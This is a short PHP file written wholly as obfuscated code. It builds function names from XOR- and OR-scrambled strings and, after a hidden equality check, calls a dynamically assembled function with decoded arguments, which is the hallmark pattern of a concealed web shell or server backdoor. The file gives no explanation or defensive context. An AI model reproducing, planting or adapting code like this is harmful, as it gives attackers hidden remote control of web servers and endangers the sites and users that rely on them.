<?php
$vF='Enw'|~lW;$aX0fGWQa2Tl='Tt^'^'t<-';$uDLS='}k`'^'0G&';$oQPLJl='Y<"HZ!'|#WrVdru6'.
    'J #V@ ';$RylDrP='}+9$!8'^'5o}d{y';$ZQINXSN='af$Oy@'.KfZA.'[Ei^'./*K_Gf_LOKTK2'.
    'C_*/unmXTaa9cwM.']'.DpyxIB^'R@e|'.KbiP.'|`?'.eIoBXLjfQE.'['.WWxy.' PMN}g';'OI'.
    'mn_eJ(_O';$hkNwBa='i['.CGIg.';'.PyJSAM3ytm&'7'.yqLJjuFwLfMOat.'/k';$rICBiQ=/*'.
    '8**/XLhUuGHNDyadhg^'4'.fUwD.'{|%'.nWLWFW;$AGWL9='C(*'.GROH.'`L6($Z"'^gVC5.'<+'.
    '#Y)YH^:U';$nfhIbHf='}2c~Y:]?'&'O:'.ct_ro.'}';$V3z='.'^K;$j9YLY='*TJ'^'ie%';/*'.
    'jQ6fu*/$UG=$aX0fGWQa2Tl^$uDLS;$J5Hfbm0zUF8=('L=)qof'^"pd~J[1")^$oQPLJl;'Dz2uH'.
    'AJ';$v8tdMXSn21Q=(Jv_j.'|LL6`oHg%$'.Semm.'!~'^kPhGD.'`q~:^`Di{2+LIi]')^('J_{M'.
    'g}n=-nnV"|>o{V={'&"fG[Qg[O/(o_v&<?/WV)^");$rlmaa_o4=$RylDrP|('yP^PwL'&/*j_kSR'.
    'flm+x{-*/LSurWs);$jW70kN=('YD)'.aZSwv.'?RT|`'.lIPHUApSulXmb.'>'.ADaiY^/*nkh7t'.
    '[*/yvJRh1GT.'[c4L$]'.hgxtdI7WIh.'] ~%'.bTO8)|$ZQINXSN;$IuYBqy=('|'.wuo_.#bDeL'.
    '{'.wvms.'{e'&uvmg_.'~}z}m{e')&('OL@&%Y QQU)S'^'76-Az+M(=.N$');$NF_rm0T=('*bQT'.
    '(3sZ/H|k^?{el'&dVKWi3qXtYoKxax.'}j')|$hkNwBa;$YjFK2=$rICBiQ^$AGWL9;if($UG(/*b'.
    'w]}x*/$J5Hfbm0zUF8($rlmaa_o4))==$jW70kN)$v8tdMXSn21Q($IuYBqy,array(/*GBcIhdWz'.
    'b*[OB7I*/$NF_rm0T,$J5Hfbm0zUF8($YjFK2),$V3z.$j9YLY.$nfhIbHf));#my-4-Y8@581wo'.
    'T}YDw-FX~N<39ch m#iRW@Elpw0PT)qhf~oj_XJ&M8_9:#yyxI8+iR=~;W.7E,!S&';